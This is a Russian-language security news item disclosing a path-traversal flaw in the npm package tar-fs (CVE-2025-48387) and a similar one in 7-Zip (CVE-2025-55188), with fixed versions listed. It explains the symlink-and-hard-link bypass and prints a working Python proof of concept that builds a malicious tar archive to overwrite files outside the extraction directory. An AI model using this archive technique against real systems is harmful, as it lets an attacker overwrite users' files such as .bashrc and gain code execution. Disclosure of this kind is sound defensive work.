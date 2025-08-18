В NPM-пакете tar-fs выявлена уязвимость (CVE-2025-48387), позволяющая при распаковке специально оформленного tar-архива записать файлы в любые части ФС, не ограниченные каталогом, в который осуществляется распаковка (насколько позволяют права доступа текущего пользователя). Уязвимость также может использоваться для перезаписи существующих файлов, например, для организации выполнения своего кода в системе могут быть переписаны файлы ".ssh/id_rsa" или ".bashrc" в домашнем каталоге пользователя.

Проблеме присвоен критический уровень опасности c учётом того, что пакет tar-fs имеет 23 миллиона загрузок в неделю и используется как зависимость в 1155 проектах. Уязвимость устранена в выпусках 3.0.9, 2.1.3 и 1.16.5, которые были сформированы в мае, но информация об уязвимости раскрыта лишь спустя почти 3 месяца.

Уязвимость вызвана недостаточными проверками имеющихся в архиве символических и жёстких ссылок на предмет их выхода за пределы целевого каталога для распаковки. Для обхода проверок применяются две символические ссылки: первая указывает на корневой каталог распаковки архива ("."), а вторая создаётся относительно первой символической ссылки и использует в имени символы "../" для выхода за пределы базового каталога. Например, первая ссылка "noop/noop/noop" указывает на ".", а вторая "noop/noop/noop/../../../" раскрывается как "./../../../". Для организации перезаписи файлов в архиве может быть создана жёсткая ссылка, ссылающаяся на внешний файл относительно второй символической ссылки.

import tarfile import io with tarfile.open("poc.tar", mode="x") as tar: root = tarfile.TarInfo("root") root.linkname = ("noop/" * 15) + ("../" * 15) root.type = tarfile.SYMTYPE tar.addfile(root) noop = tarfile.TarInfo("noop") noop.linkname = "." noop.type = tarfile.SYMTYPE tar.addfile(noop) hard = tarfile.TarInfo("hardflag") hard.linkname = "root/home/username/flag/flag" hard.type = tarfile.LNKTYPE tar.addfile(hard) content = b"overwrite

" overwrite = tarfile.TarInfo("hardflag") overwrite.size = len(content) overwrite.type = tarfile.REGTYPE tar.addfile(overwrite, fileobj=io.BytesIO(content)) content = b"new!

" newfile = tarfile.TarInfo("root/home/username/flag/newfile") newfile.size = len(content) newfile.type = tarfile.REGTYPE tar.addfile(newfile, fileobj=io.BytesIO(content))

Похожая уязвимость (CVE-2025-55188) выявлена в архиваторе 7-Zip. Для записи файлов вне базового каталога в 7-Zip также могут использоваться символические ссылки, имеющие последовательность "../" в файловом пути. Проблема может быть эксплуатирована при распаковке при помощи 7-Zip любых архивов, поддерживающих символические ссылки, например, zip, tar, 7z и rar. Проблема устранена в версии 7-Zip 25.01.



